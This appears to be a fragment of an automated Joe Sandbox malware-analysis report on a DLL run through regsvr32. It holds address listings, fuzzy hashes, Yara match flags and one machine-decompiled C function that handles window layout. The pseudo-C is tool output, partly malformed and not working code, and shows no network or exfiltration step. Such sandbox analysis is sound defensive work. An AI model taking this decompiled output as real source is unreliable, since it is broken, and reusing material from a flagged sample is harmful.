                                                                              0x1004fe86
                                                                              0x1004fe86
                                                                              0x1004fe8d
                                                                              0x1004fe8f
                                                                              0x1004fe93
                                                                              0x1004fe98
                                                                              0x1004fe9c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004fea6
                                                                              0x1004fea9
                                                                              0x1004feae
                                                                              0x00000000
                                                                              0x1004feae
                                                                              0x1004fd83
                                                                              0x1004fd88
                                                                              0x1004fd8c
                                                                              0x1004fd91
                                                                              0x1004fd91
                                                                              0x1004fd96
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004fd9d
                                                                              0x1004fda5
                                                                              0x1004fda8
                                                                              0x1004fdab
                                                                              0x1004fdad
                                                                              0x1004fdb0
                                                                              0x1004fdb5
                                                                              0x1004fdb9
                                                                              0x1004fdbe
                                                                              0x1004fdc1
                                                                              0x1004fdc6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004fdc8
                                                                              0x1004fdca
                                                                              0x1004fdcd
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004fdcd
                                                                              0x1004fc9f
                                                                              0x1004fca3
                                                                              0x1004fca7
                                                                              0x1004fca9
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004fcab
                                                                              0x1004fcaf
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004fcb1
                                                                              0x1004fcb4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004fcb6
                                                                              0x1004fcbb
                                                                              0x1004fcbf
                                                                              0x1004fcc2
                                                                              0x1004fcc6
                                                                              0x1004fcc9
                                                                              0x00000000
                                                                              0x1004fcc9
                                                                              0x1004fc71
                                                                              0x1004fc75
                                                                              0x1004fc79
                                                                              0x1004fc7b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004fc7d
                                                                              0x1004fc80
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004fc82
                                                                              0x1004fc85
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1004fc87
                                                                              0x1004fc8c
                                                                              0x00000000
                                                                              0x1004fc8c
                                                                              0x1004fc4c
                                                                              0x1004fc51
                                                                              0x1004fc55
                                                                              0x1004fc58
                                                                              0x1004fc5c
                                                                              0x1004fc5f
                                                                              0x1004fc5f
                                                                              0x1004ff8e
                                                                              0x1004ff8e
                                                                              0x1004ff8e
                                                                              0x1004ff97
                                                                              0x00000000
                                                                              0x1004ff97
                                                                              0x1004f97d
                                                                              0x1004f982
                                                                              0x1004f98c
                                                                              0x1004f98f
                                                                              0x1004f993
                                                                              0x1004f997
                                                                              0x1004f99b
                                                                              0x1004f99f
                                                                              0x00000000
                                                                              0x1004f99f

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                              • API String ID: 1269745586-2761157908
                                                                              • Opcode ID: d97f29646eedf52fe3bd68278cf5645aee36869c946e5470482c7f81a84c20ef
                                                                              • Instruction ID: 3534ba35c5e07cd7ebc5f9acb9044d3571161718e51e834254798cf9f6bda851
                                                                              • Opcode Fuzzy Hash: d97f29646eedf52fe3bd68278cf5645aee36869c946e5470482c7f81a84c20ef
                                                                              • Instruction Fuzzy Hash: C772FDB3B286918BD324CF29E054B5EBBA1F391784F619129EB8587F58D739D844CF04
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018000BEF0 Relevance: 5.4, Strings: 4, Instructions: 360COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: &$5RX$WE0$\h]
                                                                              • API String ID: 0-3485045178
                                                                              • Opcode ID: 03a43095a46f3f61d774493bb922c9041777d8e7f6728b8083ed9e1489c990f2
                                                                              • Instruction ID: bcdd786ba30a02497e69aa8425991a4f00e6ab9cdb2a577162cf86c9936701da
                                                                              • Opcode Fuzzy Hash: 03a43095a46f3f61d774493bb922c9041777d8e7f6728b8083ed9e1489c990f2
                                                                              • Instruction Fuzzy Hash: 4502E4705187C88BD794DFA8C48A69FFBE1FB94744F104A1DF486862A0DBF4D949CB42
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180013674 Relevance: 5.3, Strings: 4, Instructions: 329COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: A1$A1$\)$v8
                                                                              • API String ID: 0-2822171287
                                                                              • Opcode ID: 392d2325a62e3d43b495978243ee00a583b670d5214b1fd2fb6c21b80fcb7928
                                                                              • Instruction ID: 6e847e787c057b57acc1c354f394c9b4082fee365cea8ba22b71c11ea9ebc013
                                                                              • Opcode Fuzzy Hash: 392d2325a62e3d43b495978243ee00a583b670d5214b1fd2fb6c21b80fcb7928
                                                                              • Instruction Fuzzy Hash: 40F1EF71904348DBCF9CDF68C88A6DE7FA1FF48394FA05129FA4697250C7759989CB80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00000001800126A8 Relevance: 5.3, Strings: 4, Instructions: 317COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: *ECV$;.$;.$pv>&
                                                                              • API String ID: 0-2557916696
                                                                              • Opcode ID: 4cb81f83a04ef04c4b0be031f68b033a83f7e38034b852111fd97ec7dec363fa
                                                                              • Instruction ID: 7999f9c4935295cc2aa309186ca72e602cbe03928e3ff34651e0e21172d74868
                                                                              • Opcode Fuzzy Hash: 4cb81f83a04ef04c4b0be031f68b033a83f7e38034b852111fd97ec7dec363fa
                                                                              • Instruction Fuzzy Hash: 52F1C0B0505609DFCB98CF28C599ADA7BE0FF48348F41812EFC4A9B260D774DA68DB45
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018002D098 Relevance: 5.3, Strings: 4, Instructions: 255COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Hwn$NR'$$fkD$}gK
                                                                              • API String ID: 0-1908897248
                                                                              • Opcode ID: a42200c2a405048015f864ccfe9f3e227c0945315cfa0ff0bef3f4c816ba0cee
                                                                              • Instruction ID: b3495f7b3258c7cfbbaf34d24a151d9f74cd673a76d708f913f7006ffd896b9d
                                                                              • Opcode Fuzzy Hash: a42200c2a405048015f864ccfe9f3e227c0945315cfa0ff0bef3f4c816ba0cee
                                                                              • Instruction Fuzzy Hash: 4AE1E6701083C8CBDBFADF64C889BDA7BACFB44708F105519EA0A9E258DB745789CB01
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00000001800184E8 Relevance: 5.2, Strings: 4, Instructions: 250COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !vT$3P$?gs $Y^u
                                                                              • API String ID: 0-3532888945
                                                                              • Opcode ID: b61af7194893f8c82987b2510d64685971d92872f6245166d2af23a9bb7efed9
                                                                              • Instruction ID: a130400614884e80b8bc041bf9d1a61bd98fb93a976fe1395b57ea9810b4de45
                                                                              • Opcode Fuzzy Hash: b61af7194893f8c82987b2510d64685971d92872f6245166d2af23a9bb7efed9
                                                                              • Instruction Fuzzy Hash: 72C1207160170DCBDBA8CF28C18A6CE3BE5FF48354F104129FC1A9A261D7B4EA59DB45
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00000001800243F4 Relevance: 5.2, Strings: 4, Instructions: 240COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: -,$7k A$k$2s
                                                                              • API String ID: 0-3102563331
                                                                              • Opcode ID: 21b97ee769df899699db8ec55527806a56553d5edd7851697391367575400d1c
                                                                              • Instruction ID: bac349e1162b647475c44c7bb34b04b6f4b8289c4e67fa9b2355cb93066e8c6e
                                                                              • Opcode Fuzzy Hash: 21b97ee769df899699db8ec55527806a56553d5edd7851697391367575400d1c
                                                                              • Instruction Fuzzy Hash: 36C1387151074D9BCF89DF28C88A5DD3BB1FB48398F566219FC4AA6260C7B4D584CF84
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180003050 Relevance: 5.2, Strings: 4, Instructions: 159COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4<$4<$Hhr$J;}
                                                                              • API String ID: 0-2050331814
                                                                              • Opcode ID: c5a04ea52945682b476d42612895679d50d29c6124b176cb0c2b711214be2d9b
                                                                              • Instruction ID: 3d3ba58424421bda00612f90d71964148b60402fac749f980543760ede98840e
                                                                              • Opcode Fuzzy Hash: c5a04ea52945682b476d42612895679d50d29c6124b176cb0c2b711214be2d9b
                                                                              • Instruction Fuzzy Hash: 7461F4B0615648DFDF58DF68C08A69A7BA1FB48354F00C12EFC1ADB294DB70DA58CB45
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000000018000F048 Relevance: 5.1, Strings: 4, Instructions: 132COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: :U$<;?:${(${(
                                                                              • API String ID: 0-1086306767
                                                                              • Opcode ID: adfd1542a6b862dcbbf80cb55e1091ef2c2665d1724c34312d1a81eba162a757
                                                                              • Instruction ID: ff3a3435717f4ead1b58fb824901535bd9cf299cdf9a7bd1c813f3606ded2d6e
                                                                              • Opcode Fuzzy Hash: adfd1542a6b862dcbbf80cb55e1091ef2c2665d1724c34312d1a81eba162a757
                                                                              • Instruction Fuzzy Hash: 0861E0705187848BD768CF28C18965FBBF0FB8A748F10891EF68686260D7B6D948CB03
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0000000180015DF4 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.943069664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Oh$h<$t010$|N.
                                                                              • API String ID: 0-2324740333
                                                                              • Opcode ID: 35c0cfe6136cac06300efd424f395a2521218bc7fc47dd603edd05c4400a0958
                                                                              • Instruction ID: 16379aaf1bb4413e0c13418f9d8c18c2bc98b7e827952bd0a9b5f9990c6c03cf
                                                                              • Opcode Fuzzy Hash: 35c0cfe6136cac06300efd424f395a2521218bc7fc47dd603edd05c4400a0958
                                                                              • Instruction Fuzzy Hash: E051B1B090034A8BCF48DF68D48A4DE7FB1FB58398F60461DE85AAA250D37496A4CFC5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001C60C Relevance: 4.8, APIs: 3, Instructions: 303COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 74%
                                                                              			E1001C60C(signed int __ebx, void* __edi, intOrPtr* __rcx, signed int* __rdx) {
				signed long long _t119;
				void* _t124;
				signed int _t127;
				signed char _t131;
				void* _t136;
				signed int _t163;
				signed int _t165;
				signed char _t168;
				signed int _t171;
				signed int _t180;
				unsigned long long _t214;
				intOrPtr* _t220;
				unsigned int _t221;
				void* _t223;
				unsigned long long _t224;
				signed long long _t239;
				unsigned int _t242;
				signed int _t253;
				void* _t259;
				intOrPtr* _t260;
				void* _t262;
				unsigned long long _t263;
				void* _t265;
				signed int* _t266;
				unsigned int* _t268;
				intOrPtr* _t269;
				signed char* _t270;
				void* _t271;
				void* _t272;
				void* _t274;
				void* _t288;
				signed int _t290;
				unsigned long long _t291;
				unsigned long long _t293;
				unsigned long long _t294;
				signed long long _t295;
				void* _t296;
				void* _t299;
				void* _t300;
				signed long long _t301;
				unsigned int _t303;

				_t163 = __ebx;
				 *(_t271 + 0x20) = r9d;
				 *(_t271 + 0x18) = r8d;
				 *((long long*)(_t271 + 0x10)) = __rdx;
				_t272 = _t271 - 0x88;
				_t214 =  *__rcx;
				r13d = 0;
				r12d = r9d;
				r14d = r8d;
				_t266 = __rdx;
				 *__rdx = r13d;
				__rdx[1] = r13d;
				r9d = 0;
				_t171 = 0x418;
				r8d = 0;
				_t260 = __rcx;
				_t263 = _t291;
				_t119 =  *((intOrPtr*)(_t214 + 0x220))(_t300, _t296, _t291, _t288, _t259, _t262, _t265, _t223);
				_t6 = _t291 - 1; // -1
				_t274 = _t6;
				_t181 = _t119 - r13d;
				_t224 = _t214;
				_t301 = _t119;
				if(_t119 == r13d) {
					L6:
					if(_t163 <= r13d) {
						L56:
						SetRectEmpty();
						_t165 = r14d & 0x00000002;
						r8d = _t165;
						 *((intOrPtr*)( *_t260 + 0x280))();
						r11d =  *(_t272 + 0x5c);
						r11d = r11d -  *((intOrPtr*)(_t272 + 0x64));
						r14d = r14d & 0x00000001;
						_t266[1] = _t266[1] + r11d;
						 *_t266 =  *_t266 +  *(_t272 + 0x58) -  *((intOrPtr*)(_t272 + 0x60));
						r9d = _t165;
						r8d = r14d;
						_t124 = E10018958(_t272 + 0xd8);
						_t125 =  >  ?  *_t266 : _t124;
						 *_t266 =  >  ?  *_t266 : _t124;
						_t127 =  >  ? _t266[1] :  *((intOrPtr*)(_t272 + 0xdc));
						_t266[1] = _t127;
						return _t127;
					}
					_t168 =  *(_t260 + 0xdc);
					if((_t168 & 0x00000002) != 0) {
						L24:
						_t253 = _t272 + 0xd0;
						r9d = _t163;
						E1001BA20(_t163, _t260, _t253, _t263);
						 *_t266 =  *_t214;
						if((r14b & 0x00000040) == 0) {
							L55:
							L10009490(_t214, _t263);
							goto L56;
						}
						 *(_t272 + 0x40) = _t291;
						r12d = r13d;
						 *(_t260 + 0x118) = r13d;
						 *(_t272 + 0xd0) =  *(_t260 + 0x118);
						if(_t301 <= _t291) {
							L40:
							_t131 =  *(_t260 + 0xdc);
							if((_t131 & 0x00000001) != 0 && (_t131 & 0x00000004) != 0) {
								 *(_t260 + 0xc8) =  *_t266;
							}
							_t204 = _t163 - r13d;
							_t180 = r13d;
							if(_t163 <= r13d) {
								L47:
								if(r12d <= r13d) {
									L54:
									_t266 =  *((intOrPtr*)(_t272 + 0xd8));
									 *(_t260 + 0x118) =  *(_t272 + 0xd0);
									goto L55;
								}
								_t303 =  *(_t272 + 0x40);
								_t290 = r12d;
								if(_t290 <= _t291) {
									L53:
									L10009490(_t214, _t303);
									goto L54;
								}
								_t268 = _t303 + 8;
								do {
									E10015FAC(_t214, _t260);
									_t293 = _t214;
									if(_t214 != 0) {
										GetWindowRect();
										 *(_t272 + 0x50) =  *(_t272 + 0x58) - r11d;
										 *((intOrPtr*)(_t272 + 0x54)) =  *(_t272 + 0x5c) - r11d;
										_t136 =  *((intOrPtr*)( *_t260 + 0x2e8))();
										r11d =  *(_t272 + 0x58);
										_t214 =  *(_t272 + 0x50) >> 0x20;
										r8d = _t224 + ( *_t268 >> 0x20);
										 *((intOrPtr*)(_t272 + 0x30)) = 0x15;
										 *(_t272 + 0x48) = r8d;
										 *((intOrPtr*)(_t272 + 0x4c)) = _t136 +  *(_t272 + 0x5c);
										 *(_t272 + 0x28) = 0;
										 *(_t272 + 0x20) = 0;
										E1001621C(_t293, _t272 + 0x58);
									}
									_t268 =  &(_t268[6]);
									_t290 = _t290 - 1;
								} while (_t290 != 0);
								goto L53;
							} else {
								_t294 = _t263;
								do {
									E1001B798(_t163, _t168, _t180, _t204, _t260, _t294);
									_t180 = _t180 + 1;
									_t294 = _t294 + 0x20;
								} while (_t180 < _t163);
								r13d = 0;
								goto L47;
							}
						}
						_t46 = _t263 + 4; // 0x4
						_t269 = _t46;
						_t239 = _t301;
						_t220 = _t269;
						do {
							if(( *(_t220 + 5) & 0x00000001) != 0 &&  *_t220 != r13d) {
								r12d = r12d + 1;
							}
							_t220 = _t220 + 0x20;
							_t239 = _t239 - 1;
						} while (_t239 != 0);
						_t194 = r12d - r13d;
						if(r12d <= r13d) {
							L39:
							_t266 =  *((intOrPtr*)(_t272 + 0xd8));
							goto L40;
						}
						_t221 =  <  ? 0xffffffff : _t220;
						_t242 = _t221;
						E10009454(_t194, _t221, _t242);
						_t168 = 0;
						 *(_t272 + 0x40) = _t221;
						_t214 = r12d;
						 *(_t272 + 0x50) = _t242;
						 *(_t272 + 0x48) = _t253;
						 *(_t272 + 0x58) = _t214;
						r12d = r13d;
						_t299 = _t221 + 8;
						while(_t253 < _t214) {
							if(( *(_t269 + 5) & 0x00000001) != 0) {
								_t198 =  *_t269;
								if( *_t269 != 0) {
									 *(_t299 - 8) = r13d;
									 *((intOrPtr*)(_t299 - 4)) =  *_t269;
									 *((intOrPtr*)( *_t260 + 0x2e8))();
									E1000C7F4(_t198, _t260, _t272 + 0x68);
									_t242 =  *(_t272 + 0x50);
									asm("movdqu xmm5, [esp+0x68]");
									asm("repe inc ecx");
									_t214 =  *(_t272 + 0x58);
									_t253 =  *(_t272 + 0x48) + 1;
									r12d = r12d + 1;
									_t299 = _t299 + 0x18;
									 *(_t272 + 0x48) = _t253;
								}
							}
							_t242 = _t242 + 1;
							r13d = r13d + 1;
							_t269 = _t269 + 0x20;
							 *(_t272 + 0x50) = _t242;
							if(_t242 < _t301) {
								continue;
							} else {
								break;
							}
						}
						r14d =  *(_t272 + 0xe0);
						r13d = 0;
						goto L39;
					}
					if((_t168 & 0x00000004) == 0) {
						L21:
						asm("inc ebp");
						r9d = r9d & 0x00007fff;
						__eflags = r9d;
						L22:
						 *(_t272 + 0x20) = r13d;
						L23:
						r8d = _t163;
						E1001BB54(_t168, _t171, _t214, _t260, _t263, _t284);
						goto L24;
					}
					if((r14b & 0x00000004) == 0) {
						__eflags = r14b & 0x00000008;
						if((r14b & 0x00000008) == 0) {
							__eflags = r14b & 0x00000010;
							if((r14b & 0x00000010) == 0) {
								__eflags = r12d - r8d;
								if(r12d == r8d) {
									__eflags = _t168 & 0x00000001;
									if((_t168 & 0x00000001) != 0) {
										goto L10;
									}
									goto L21;
								}
								SetRectEmpty();
								r8d = r14d;
								r8d = r8d & 0x00000002;
								 *((intOrPtr*)( *_t260 + 0x280))();
								r11d = r14d;
								r11d = r11d & 0x00000020;
								__eflags = r11d;
								if(r11d == 0) {
									__eflags =  *((intOrPtr*)(_t272 + 0x60)) -  *(_t272 + 0x58);
								}
								r9d = _t214 + _t288;
								 *(_t272 + 0x20) = r11d;
								goto L23;
							}
							r9d = 0;
							goto L22;
						}
						r9d = 0x7fff;
						goto L22;
					}
					L10:
					r9d =  *(_t260 + 0xc8);
					goto L22;
				}
				_t7 = _t291 + 0x20; // 0x20
				_t171 = _t7 * _t301 >> 0x20;
				_t214 =  <  ? _t274 : _t214;
				E10009454(_t181, _t214, _t214);
				r12d = r13d;
				_t263 = _t214;
				if(_t301 <= _t291) {
					L5:
					r12d =  *(_t272 + 0xe8);
					goto L6;
				}
				_t12 = _t214 + 8; // 0x8
				_t270 = _t12;
				_t295 = _t301;
				do {
					_t284 =  *_t260;
					_t171 = 0x417;
					 *((intOrPtr*)( *_t260 + 0x220))();
					 *_t270 =  *_t270 ^ 0x00000004;
					_t270 =  &(_t270[0x20]);
					r12d = r12d + 1;
					_t295 = _t295 - 1;
				} while (_t295 != 0);
				_t266 =  *((intOrPtr*)(_t272 + 0xd8));
				goto L5;
			}












































                                                                              0x1001c60c
                                                                              0x1001c60c
                                                                              0x1001c611
                                                                              0x1001c616
                                                                              0x1001c627
                                                                              0x1001c62e
                                                                              0x1001c631
                                                                              0x1001c634
                                                                              0x1001c637
                                                                              0x1001c63a
                                                                              0x1001c63d
                                                                              0x1001c640
                                                                              0x1001c644
                                                                              0x1001c647
                                                                              0x1001c64c
                                                                              0x1001c64f
                                                                              0x1001c652
                                                                              0x1001c655
                                                                              0x1001c65b
                                                                              0x1001c65b
                                                                              0x1001c65f
                                                                              0x1001c662
                                                                              0x1001c665
                                                                              0x1001c668
                                                                              0x1001c6d1
                                                                              0x1001c6d4
                                                                              0x1001ca0c
                                                                              0x1001ca11
                                                                              0x1001ca1d
                                                                              0x1001ca28
                                                                              0x1001ca2b
                                                                              0x1001ca31
                                                                              0x1001ca3a
                                                                              0x1001ca43
                                                                              0x1001ca47
                                                                              0x1001ca4b
                                                                              0x1001ca56
                                                                              0x1001ca59
                                                                              0x1001ca5f
                                                                              0x1001ca6f
                                                                              0x1001ca73
                                                                              0x1001ca80
                                                                              0x1001ca84
                                                                              0x1001ca9d
                                                                              0x1001ca9d
                                                                              0x1001c6da
                                                                              0x1001c6e3
                                                                              0x1001c790
                                                                              0x1001c790
                                                                              0x1001c798
                                                                              0x1001c7a1
                                                                              0x1001c7ad
                                                                              0x1001c7b1
                                                                              0x1001ca04
                                                                              0x1001ca07
                                                                              0x00000000
                                                                              0x1001ca07
                                                                              0x1001c7c0
                                                                              0x1001c7c5
                                                                              0x1001c7c8
                                                                              0x1001c7cf
                                                                              0x1001c7d6
                                                                              0x1001c8dc
                                                                              0x1001c8dc
                                                                              0x1001c8e4
                                                                              0x1001c8ed
                                                                              0x1001c8ed
                                                                              0x1001c8f3
                                                                              0x1001c8f6
                                                                              0x1001c8f9
                                                                              0x1001c919
                                                                              0x1001c91c
                                                                              0x1001c9ef
                                                                              0x1001c9f6
                                                                              0x1001c9fe
                                                                              0x00000000
                                                                              0x1001c9fe
                                                                              0x1001c922
                                                                              0x1001c927
                                                                              0x1001c92d
                                                                              0x1001c9e7
                                                                              0x1001c9ea
                                                                              0x00000000
                                                                              0x1001c9ea
                                                                              0x1001c933
                                                                              0x1001c937
                                                                              0x1001c93d
                                                                              0x1001c945
                                                                              0x1001c948
                                                                              0x1001c957
                                                                              0x1001c97e
                                                                              0x1001c982
                                                                              0x1001c989
                                                                              0x1001c98f
                                                                              0x1001c999
                                                                              0x1001c99d
                                                                              0x1001c9a1
                                                                              0x1001c9ad
                                                                              0x1001c9b4
                                                                              0x1001c9c4
                                                                              0x1001c9cc
                                                                              0x1001c9d4
                                                                              0x1001c9d4
                                                                              0x1001c9d9
                                                                              0x1001c9dd
                                                                              0x1001c9dd
                                                                              0x00000000
                                                                              0x1001c8fb
                                                                              0x1001c8fb
                                                                              0x1001c8fe
                                                                              0x1001c906
                                                                              0x1001c90b
                                                                              0x1001c90e
                                                                              0x1001c912
                                                                              0x1001c916
                                                                              0x00000000
                                                                              0x1001c916
                                                                              0x1001c8f9
                                                                              0x1001c7dc
                                                                              0x1001c7dc
                                                                              0x1001c7e0
                                                                              0x1001c7e3
                                                                              0x1001c7e6
                                                                              0x1001c7ea
                                                                              0x1001c7f1
                                                                              0x1001c7f1
                                                                              0x1001c7f5
                                                                              0x1001c7f9
                                                                              0x1001c7f9
                                                                              0x1001c7ff
                                                                              0x1001c802
                                                                              0x1001c8d4
                                                                              0x1001c8d4
                                                                              0x00000000
                                                                              0x1001c8d4
                                                                              0x1001c81a
                                                                              0x1001c81e
                                                                              0x1001c821
                                                                              0x1001c826
                                                                              0x1001c82d
                                                                              0x1001c832
                                                                              0x1001c835
                                                                              0x1001c83a
                                                                              0x1001c83f
                                                                              0x1001c844
                                                                              0x1001c847
                                                                              0x1001c84b
                                                                              0x1001c854
                                                                              0x1001c856
                                                                              0x1001c85a
                                                                              0x1001c85c
                                                                              0x1001c868
                                                                              0x1001c875
                                                                              0x1001c883
                                                                              0x1001c88d
                                                                              0x1001c892
                                                                              0x1001c898
                                                                              0x1001c89d
                                                                              0x1001c8a2
                                                                              0x1001c8a6
                                                                              0x1001c8aa
                                                                              0x1001c8ae
                                                                              0x1001c8ae
                                                                              0x1001c85a
                                                                              0x1001c8b3
                                                                              0x1001c8b7
                                                                              0x1001c8bb
                                                                              0x1001c8c2
                                                                              0x1001c8c7
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001c8c7
                                                                              0x1001c8c9
                                                                              0x1001c8d1
                                                                              0x00000000
                                                                              0x1001c8d1
                                                                              0x1001c6ee
                                                                              0x1001c76c
                                                                              0x1001c773
                                                                              0x1001c776
                                                                              0x1001c776
                                                                              0x1001c77d
                                                                              0x1001c77d
                                                                              0x1001c782
                                                                              0x1001c782
                                                                              0x1001c78b
                                                                              0x00000000
                                                                              0x1001c78b
                                                                              0x1001c6f4
                                                                              0x1001c6ff
                                                                              0x1001c703
                                                                              0x1001c70d
                                                                              0x1001c711
                                                                              0x1001c718
                                                                              0x1001c71b
                                                                              0x1001c767
                                                                              0x1001c76a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001c76a
                                                                              0x1001c722
                                                                              0x1001c72b
                                                                              0x1001c733
                                                                              0x1001c73a
                                                                              0x1001c741
                                                                              0x1001c744
                                                                              0x1001c744
                                                                              0x1001c748
                                                                              0x1001c758
                                                                              0x1001c758
                                                                              0x1001c75c
                                                                              0x1001c760
                                                                              0x00000000
                                                                              0x1001c760
                                                                              0x1001c713
                                                                              0x00000000
                                                                              0x1001c713
                                                                              0x1001c705
                                                                              0x00000000
                                                                              0x1001c705
                                                                              0x1001c6f6
                                                                              0x1001c6f6
                                                                              0x00000000
                                                                              0x1001c6f6
                                                                              0x1001c66a
                                                                              0x1001c66e
                                                                              0x1001c671
                                                                              0x1001c678
                                                                              0x1001c680
                                                                              0x1001c683
                                                                              0x1001c686
                                                                              0x1001c6c2
                                                                              0x1001c6c2
                                                                              0x00000000
                                                                              0x1001c6ca
                                                                              0x1001c688
                                                                              0x1001c688
                                                                              0x1001c68c
                                                                              0x1001c68f
                                                                              0x1001c68f
                                                                              0x1001c699
                                                                              0x1001c6a1
                                                                              0x1001c6a8
                                                                              0x1001c6ac
                                                                              0x1001c6b0
                                                                              0x1001c6b4
                                                                              0x1001c6b4
                                                                              0x1001c6ba
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
